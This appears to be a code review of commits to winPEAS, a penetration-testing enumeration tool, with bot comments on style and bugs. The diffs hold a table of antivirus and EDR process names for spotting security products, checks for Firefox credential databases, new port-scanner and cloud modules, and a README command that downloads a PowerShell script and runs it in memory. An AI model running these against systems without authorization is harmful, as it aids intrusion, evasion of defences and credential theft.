{"pfwadmin.exe" , ""},
{"pgmonitr.exe" , ""},
{"pingscan.exe" , ""},
{"platin.exe" , ""},
{"pop3trap.exe" , ""},
{"poproxy.exe" , ""},
{"popscan.exe" , ""},
{"portdetective.exe" , ""},
{"portmonitor.exe" , ""},
{"powerscan.exe" , ""},
{"ppinupdt.exe" , ""},
{"pptbc.exe" , ""},
{"ppvstop.exe" , ""},
{"prizesurfer.exe" , ""},
{"prmt.exe" , ""},
{"prmvr.exe" , ""},
{"procdump.exe" , ""},
{"processmonitor.exe" , ""},
{"procexp.exe" , ""},
{"procexp64.exe" , ""},
{"procexplorerv1.0.exe" , ""},
{"procmon.exe" , ""},
{"programauditor.exe" , ""},
{"proport.exe" , ""},
{"protectx.exe" , ""},
{"pspf.exe" , ""},
{"purge.exe" , ""},
{"qconsole.exe" , ""},
{"qserver.exe" , ""},
{"rapapp.exe" , ""},
{"rav7.exe" , ""},
{"rav7win.exe" , ""},
{"rav8win32eng.exe" , ""},
{"ray.exe" , ""},
{"rb32.exe" , ""},
{"rcsync.exe" , ""},
{"realmon.exe" , ""},
{"reged.exe" , ""},
{"regedit.exe" , ""},
{"regedt32.exe" , ""},
{"rescue.exe" , ""},
{"rescue32.exe" , ""},
{"rrguard.exe" , ""},
{"rtvscan.exe" , ""},
{"rtvscn95.exe" , ""},
{"rulaunch.exe" , ""},
{"run32dll.exe" , ""},
{"rundll.exe" , ""},
{"rundll16.exe" , ""},
{"ruxdll32.exe" , ""},
{"safeweb.exe" , ""},
{"sahagent.exescan32.exe" , ""},
{"save.exe" , ""},
{"savenow.exe" , ""},
{"sbserv.exe" , ""},
{"scam32.exe" , ""},
{"scan32.exe" , ""},
{"scan95.exe" , ""},
{"scanpm.exe" , ""},
{"scrscan.exe" , ""},
{"SentinelOne.exe" , ""},
{"serv95.exe" , ""},
{"setupvameeval.exe" , ""},
{"setup_flowprotector_us.exe", ""},
{"sfc.exe" , ""},
{"sgssfw32.exe" , ""},
{"sh.exe" , ""},
{"shellspyinstall.exe" , ""},
{"shn.exe" , ""},
{"showbehind.exe" , ""},
{"shstat.exe" , "McAfee VirusScan Enterprise"},
{"SISIDSService.exe" , ""},
{"SISIPSUtil.exe" , ""},
{"smc.exe" , ""},
{"sms.exe" , ""},
{"smss32.exe" , ""},
{"soap.exe" , ""},
{"sofi.exe" , ""},
{"sperm.exe" , ""},
{"splunk.exe" , "Splunk"},
{"splunkd.exe" , "Splunk"},
{"splunk-admon.exe" , "Splunk"},
{"splunk-powershell.exe" , "Splunk"},
{"splunk-winevtlog.exe" , "Splunk"},
{"spf.exe" , ""},
{"sphinx.exe" , ""},
{"spoler.exe" , ""},
{"spoolcv.exe" , ""},
{"spoolsv32.exe" , ""},
{"spyxx.exe" , ""},
{"srexe.exe" , ""},
{"srng.exe" , ""},
{"ss3edit.exe" , ""},
{"ssgrate.exe" , ""},
{"ssg_4104.exe" , ""},
{"st2.exe" , ""},
{"start.exe" , ""},
{"stcloader.exe" , ""},
{"supftrl.exe" , ""},
{"support.exe" , ""},
{"supporter5.exe" , ""},
{"svchostc.exe" , ""},
{"svchosts.exe" , ""},
{"sweep95.exe" , ""},
{"sweepnet.sweepsrv.sys.swnetsup.exe", ""},
{"symproxysvc.exe" , ""},
{"symtray.exe" , ""},
{"sysedit.exe" , ""},
{"sysmon.exe" , "Sysinternals Sysmon"},
{"sysupd.exe" , ""},
{"TaniumClient.exe" , "Tanium"},
{"taskmg.exe" , ""},
{"taskmo.exe" , ""},
{"taumon.exe" , ""},
{"tbmon.exe" , ""},
{"tbscan.exe" , ""},
{"tc.exe" , ""},
{"tca.exe" , ""},
{"tcm.exe" , ""},
{"tcpview.exe" , ""},
{"tds-3.exe" , ""},
{"tds2-98.exe" , ""},
{"tds2-nt.exe" , ""},
{"teekids.exe" , ""},
{"tfak.exe" , ""},
{"tfak5.exe" , ""},
{"tgbob.exe" , ""},
{"titanin.exe" , ""},
{"titaninxp.exe" , ""},
{"tlaservice.exe" , ""},
{"tlaworker.exe" , ""},
{"tracert.exe" , ""},
{"trickler.exe" , ""},
{"trjscan.exe" , ""},
{"trjsetup.exe" , ""},
{"trojantrap3.exe" , ""},
{"tsadbot.exe" , ""},
{"tshark.exe" , ""},
{"tvmd.exe" , ""},
{"tvtmd.exe" , ""},
{"udaterui.exe" , ""},
{"undoboot.exe" , ""},
{"updat.exe" , ""},
{"update.exe" , ""},
{"updaterui.exe" , ""},
{"upgrad.exe" , ""},
{"utpost.exe" , ""},
{"vbcmserv.exe" , ""},
{"vbcons.exe" , ""},
{"vbust.exe" , ""},
{"vbwin9x.exe" , ""},
{"vbwinntw.exe" , ""},
{"vcsetup.exe" , ""},
{"vet32.exe" , ""},
{"vet95.exe" , ""},
{"vettray.exe" , ""},
{"vfsetup.exe" , ""},
{"vir-help.exe" , ""},
{"virusmdpersonalfirewall.exe", ""},
{"vnlan300.exe" , ""},
{"vnpc3000.exe" , ""},
{"vpc32.exe" , ""},
{"vpc42.exe" , ""},
{"vpfw30s.exe" , ""},
{"vptray.exe" , ""},
{"vscan40.exe" , ""},
{"vscenu6.02d30.exe" , ""},
{"vsched.exe" , ""},
{"vsecomr.exe" , ""},
{"vshwin32.exe" , ""},
{"vsisetup.exe" , ""},
{"vsmain.exe" , ""},
{"vsmon.exe" , ""},
{"vsstat.exe" , ""},
{"vstskmgr.exe" , "McAfee VirusScan Enterprise"},
{"vswin9xe.exe" , ""},
{"vswinntse.exe" , ""},
{"vswinperse.exe" , ""},
{"w32dsm89.exe" , ""},
{"w9x.exe" , ""},
{"watchdog.exe" , ""},
{"webdav.exe" , ""},
{"webscanx.exe" , ""},
{"webtrap.exe" , ""},
{"wfindv32.exe" , ""},
{"whoswatchingme.exe" , ""},
{"wimmun32.exe" , ""},
{"win-bugsfix.exe" , ""},
{"win32.exe" , ""},
{"win32us.exe" , ""},
{"winactive.exe" , ""},
{"window.exe" , ""},
{"windows.exe" , ""},
{"wininetd.exe" , ""},
{"wininitx.exe" , ""},
{"winlogin.exe" , ""},
{"winmain.exe" , ""},
{"winnet.exe" , ""},
{"winppr32.exe" , ""},
{"winrecon.exe" , ""},
{"winservn.exe" , ""},
{"winssk32.exe" , ""},
{"winstart.exe" , ""},
{"winstart001.exe" , ""},
{"wintsk32.exe" , ""},
{"winupdate.exe" , ""},
{"wireshark.exe" , ""},
{"wkufind.exe" , ""},
{"wnad.exe" , ""},
{"wnt.exe" , ""},
{"wradmin.exe" , ""},
{"wrctrl.exe" , ""},
{"wsbgate.exe" , ""},
{"wupdater.exe" , ""},
{"wupdt.exe" , ""},
{"wyvernworksfirewall.exe" , ""},
{"xagt.exe" , ""},
{"xpf202en.exe" , ""},
{"zapro.exe" , ""},
{"zapsetup3001.exe" , ""},
{"zatutor.exe" , ""},
/*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs
{"zonealarm" , ""},
{"_avp32" , ""},
{"_avpcc" , ""},
{"rshell" , ""},
{"_avpms" , ""}*/
{ "ALYac", new HashSet<string>() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } },
{ "AVG Antivirus", new HashSet<string>() { "avgui.exe", } },
{ "AVG", new HashSet<string>() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } },
{ "Ad-Aware Total Security by Lavasoft", new HashSet<string>() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } },
{ "AhnLab-V3", new HashSet<string>() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } },
{ "Antiy-AVL", new HashSet<string>() { "avl.exe", } },
{ "Arcabit", new HashSet<string>() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } },
{ "Avast Antivirus", new HashSet<string>() { "avastui.exe", } },
{ "Avast", new HashSet<string>() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } },
{ "Avira", new HashSet<string>() { "avira.webapphost.exe", } },
{ "Baidu", new HashSet<string>() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } },
{ "BitDefender", new HashSet<string>() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } },
{ "Bkav Pro", new HashSet<string>() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } },
{ "CMC", new HashSet<string>() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } },
{ "Cisco", new HashSet<string>() { "sfc.exe", } },
{ "ClamAV", new HashSet<string>() { "clamscan.exe", "freshclam.exe", } },
{ "Comodo", new HashSet<string>() { "cavwp.exe", "cfp.exe", } },
{ "CrowdStrike Falcon", new HashSet<string>() { "falconsensorwinos.exe", } },
{ "Cybereason", new HashSet<string>() { "cybereasonransomfreeservicehost.exe", } },
{ "Cylance", new HashSet<string>() { "cylancesvc.exe", } },
{ "Cynet", new HashSet<string>() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } },
{ "Cyradar", new HashSet<string>() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } },
{ "DrWeb", new HashSet<string>() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } },
{ "ESET-NOD32", new HashSet<string>() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } },
{ "F-Secure", new HashSet<string>() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } },
{ "G Data AntiVirus", new HashSet<string>() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } },
{ "GridinSoft Anti-Malware", new HashSet<string>() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } },
{ "IObit Malware Fighter 3", new HashSet<string>() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } },
{ "IObit Malware Fighter 6", new HashSet<string>() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } },
{ "IObit Security 360", new HashSet<string>() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } },
{ "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet<string>() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } },
{ "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet<string>() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } },
{ "Kaspersky Anti-Ransomware Tool for Business", new HashSet<string>() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } },
{ "Kaspersky Anti-Virus 2011", new HashSet<string>() { "kldw.exe", } },
{ "Kaspersky Anti-Virus 2013", new HashSet<string>() { "ffcert.exe", } },
{ "Kaspersky Anti-Virus Personal", new HashSet<string>() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } },
{ "Kaspersky Antivirus", new HashSet<string>() { "avp.exe", } },
{ "Kaspersky", new HashSet<string>() { "klnagent.exe", } },
{ "Malwarebytes", new HashSet<string>() { "mbam.exe", "mbar.exe", "mbae.exe", } },
{ "McAfee All Access AntiVirus Plus", new HashSet<string>() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } },
{ "McAfee AntiSpyware", new HashSet<string>() { "msssrv.exe", "mcspy.exe", "msscli.exe", } },
{ "McAfee AntiVirus Plus", new HashSet<string>() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } },
{ "McAfee Antivirus", new HashSet<string>() { "mcafee.exe", } },
{ "NANO Antivirus beta by Nano Security Ltd", new HashSet<string>() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } },
{ "NANO-Antivirus", new HashSet<string>() { "nanoav.exe", } },
{ "Norton Antivirus", new HashSet<string>() { "nortonsecurity.exe", } },
{ "PCMatic", new HashSet<string>() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } },
{ "Panda Security", new HashSet<string>() { "psanhost.exe", } },
{ "Panda", new HashSet<string>() { "avengine.exe", } },
{ "Quick Heal AntiVirus Pro", new HashSet<string>() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } },
{ "Quick Heal Total Security", new HashSet<string>() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } },
{ "Sophos Anti-Rootkit 1.5.0", new HashSet<string>() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } },
{ "Sophos Anti-Virus", new HashSet<string>() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } },
{ "Symantec Endpoint Protection", new HashSet<string>() { "ccsvchst.exe", } },
{ "Symantec", new HashSet<string>() { "sepwscsvc64.exe", } },
{ "Total Defense Anti-Virus", new HashSet<string>() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } },
{ "Trend micro", new HashSet<string>() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } },
{ "VIPRE Advanced Security by ThreatTrack Security", new HashSet<string>() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } },
{ "VIPRE Antivirus by GFI Software", new HashSet<string>() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } },
{ "ViRobot Anti-Ransomware by HAURI", new HashSet<string>() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } },
{ "ViRobot Internet Security 2011 by HAURI", new HashSet<string>() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } },
{ "Webroot", new HashSet<string>() { "wrsa.exe", } },
{ "Windows defender", new HashSet<string>() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } },
{ "Zillya Internet Security by ALLIT Service", new HashSet<string>() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } },
{ "Zillya! Antivirus by ALLIT Service", new HashSet<string>() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
{ "Zillya! Internet Security by ALLIT Service", new HashSet<string>() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
{ "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet<string>() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
{ "ZoneAlarm Antivirus by Check Point, Inc", new HashSet<string>() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
{ "ZoneAlarm by Check Point, Inc", new HashSet<string>() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
};
// reverse lookup list
public static Dictionary<string, HashSet<string>> AVVendorsByProcess = new Dictionary<string, HashSet<string>>();
static DefensiveProcesses()
{
// initialize the structure here
foreach (var kvp in Definitions)
{
var vendor = kvp.Key;
foreach (var executable in kvp.Value)
{
var sanitizedExecutable = executable.Trim().ToLower();
if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
{
AVVendorsByProcess.Add(sanitizedExecutable, new HashSet<string>() { vendor });
}
else
{
AVVendorsByProcess[sanitizedExecutable].Add(vendor);
}
}
}
}
}
}
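Review bot: The ESET-NOD32 entry `{ "ESET-NOD32", new HashSet<string>() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } }` contains `"shouldiremoveit.com"`, which is a domain name carried over from wherever the list was collected rather than a process image name, so it can never match and should be dropped; several sets also carry generic installer names (`uninstall.exe`, `unins000.exe`, `uninst.exe`, `helper.exe`, `native.exe`, `keyboard.exe`, `reporter.exe`) that will attribute unrelated processes to a vendor, so they deserve a second look. In the static constructor, `executable.Trim().ToLower()` is culture-sensitive (under a Turkish-style locale upper-case `I` does not fold to `i`), so `ToLowerInvariant()` is the safer normalization, and the lookup side, which is not visible here, has to normalize process names the same way including the `.exe` suffix these keys carry. I would record that contract above the field: `// Keys are trimmed, lower-case image names including ".exe"; callers must normalize lookups identically.` `Definitions` also changed from `public` to `private`, so any reference to `DefensiveProcesses.Definitions` outside this file would need updating; whether one exists cannot be seen from this hunk.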


@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
string dnsDomain = properties.DomainName;
const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering";
const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
using (var search = new ManagementObjectSearcher(query))
{
@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
string hotfixes = "";
foreach (ManagementObject quickFix in collection)
{
hotfixes += quickFix["HotFixID"].ToString() + ", ";
hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
}
results.Add("Hostname", strHostName);
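Review bot: The loop line `hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";` builds the list by repeated string concatenation and leaves a trailing `, ` on the result; collecting the formatted entries and emitting them with `string.Join(", ", entries)` (or a `StringBuilder`) avoids both. `InstalledOn` on `Win32_QuickFixEngineering` is a free-form string and can be empty, in which case the output reads `KBnnnnnn ()`; a fallback such as `(unknown date)` would read better, e.g. `var installedOn = quickFix["InstalledOn"]?.ToString(); if (string.IsNullOrWhiteSpace(installedOn)) installedOn = "unknown date";`. The enclosing method starts before the first hunk and ends after the second.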


@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}";
if (File.Exists(firefoxCredentialFile4))
{
results.Add(firefoxCredentialFile4);
results.Add(firefoxCredentialFile3);
}
}
}
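Review bot: One of the two printed lines inside the `if (File.Exists(firefoxCredentialFile4))` branch is `results.Add(firefoxCredentialFile3);`; if that is the line retained on the new side, the branch tests for `key4.db` but reports the `key3.db` path, and it should read `results.Add(firefoxCredentialFile4);`. The rendered page does not show which of the two lines is the new side, so this is either the copy-paste bug the commit fixes or one it introduces, and is worth confirming against the raw diff. The enclosing method starts and ends outside the hunk.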


@ -118,6 +118,7 @@
<Reference Include="System.Core" />
<Reference Include="System.DirectoryServices.AccountManagement" />
<Reference Include="System.Management" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Security" />
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Transactions" />
@ -1002,6 +1003,7 @@
<Compile Include="3rdParty\YamlSerializer\YamlTagValidator.cs" />
<Compile Include="Checks\ApplicationsInfo.cs" />
<Compile Include="Checks\BrowserInfo.cs" />
<Compile Include="Checks\CloudInfo.cs" />
<Compile Include="Checks\FileAnalysis.cs" />
<Compile Include="Checks\FilesInfo.cs" />
<Compile Include="Checks\Globals.cs" />
@ -1038,6 +1040,11 @@
<Compile Include="Info\ApplicationInfo\DeviceDrivers.cs" />
<Compile Include="Info\ApplicationInfo\InstalledApps.cs" />
<Compile Include="Helpers\Beaprint.cs" />
<Compile Include="Info\CloudInfo\AWSInfo.cs" />
<Compile Include="Info\CloudInfo\AzureInfo.cs" />
<Compile Include="Info\CloudInfo\EndpointData.cs" />
<Compile Include="Info\CloudInfo\GCPInfo.cs" />
<Compile Include="Info\CloudInfo\CloudInfoBase.cs" />
<Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" />
<Compile Include="Info\EventsInfo\Logon\Logon.cs" />
<Compile Include="Info\EventsInfo\Logon\LogonEventInfo.cs" />
@ -1058,7 +1065,7 @@
<Compile Include="Info\FilesInfo\Office\OfficeRecentFileInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\CloudSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\OneDriveSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\WSL\WSL.cs" />
<Compile Include="Info\FilesInfo\WSL\WSLHelper.cs" />
<Compile Include="Info\NetworkInfo\Enums\IPVersion.cs" />
<Compile Include="Info\NetworkInfo\Enums\MibTcpState.cs" />
<Compile Include="Info\NetworkInfo\Enums\Protocol.cs" />
@ -1068,6 +1075,10 @@
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsInfo.cs" />
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsKey.cs" />
<Compile Include="Info\NetworkInfo\NetworkConnection.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetPinger.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkUtils.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkScanner.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\PortScanner.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6ROW_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6TABLE_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCPROW_OWNER_PID.cs" />
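Review bot: The new `<Compile Include>` items break the alphabetical order the surrounding ItemGroup follows: in the `@ -1038,6 +1040,11 @@` hunk `Info\CloudInfo\CloudInfoBase.cs` is listed after `GCPInfo.cs` instead of before `EndpointData.cs`, and in the `@ -1068,6 +1075,10 @@` hunk `NetworkScanner\NetworkUtils.cs` precedes `NetworkScanner\NetworkScanner.cs`. This is cosmetic for the build, but keeping the list sorted is what makes later additions merge cleanly, so I would move the two lines to their sorted positions. The surrounding `@ -118` and `@ -1002` hunks, which each add one item in sorted position, are fine.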


@ -5,7 +5,7 @@
</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>fileanalysis debug</StartArguments>
<StartArguments>cloudinfo -network="auto" -ports="21,22,445"</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<StartArguments>debug</StartArguments>
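Review bot: The `<StartArguments>` value committed in the `Debug|AnyCPU` property group is per-developer debugger launch state, so shipping one developer's local run configuration (`cloudinfo -network="auto" -ports="21,22,445"`) to every clone is noise for other contributors and easy to commit by accident again. I would either keep this file out of version control, as is usual for per-user project settings, or reset the value to the neutral `debug` that the `Debug|x64` group below uses. The file name is not visible in this rendering, so the per-user nature is inferred from the `StartArguments` / `Configuration|Platform` shape.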


@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re
```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
```
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop